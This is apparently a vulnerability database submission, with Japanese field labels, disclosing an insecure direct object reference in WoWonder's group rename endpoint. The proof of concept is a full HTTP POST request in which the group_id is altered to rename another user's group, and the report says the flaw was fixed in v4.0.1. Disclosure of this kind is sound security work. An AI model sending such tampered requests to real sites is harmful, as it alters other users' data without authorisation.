| タイトル | Wowonder IDOR on Edit Group Name Feature |
|---|
| 説明 | Software: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302
Vendor: https://www.wowonder.com/
Summary: Attacker can edit group name even if it is not his own group. Only with group id
Proof of Concept:
1. Change group name and intercept using burpsuite
2. Edit group_id parameter to id victim group
Request
POST /requests.php?f=chat&s=edit_group HTTP/2
Host: demo.wowonder.com
Cookie: mycookie
Content-Length: 37
Sec-Ch-Ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.wowonder.com/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.wowonder.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
group_name=Takover&group_id=417&avatar=
I have reported to wowonder and it was fixed in version v4.0.1 |
|---|
| ソース | ⚠️ https://youtu.be/b665r1ZfCg4 |
|---|
| ユーザー | fariqfgi (UID 24514) |
|---|
| 送信 | 2022年03月09日 07:13 (4 年 ago) |
|---|
| モデレーション | 2022年03月13日 12:14 (4 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 194840 [Wowonder 迄 4.0.0 Group Name group_id 特権昇格] |
|---|
| ポイント | 17 |
|---|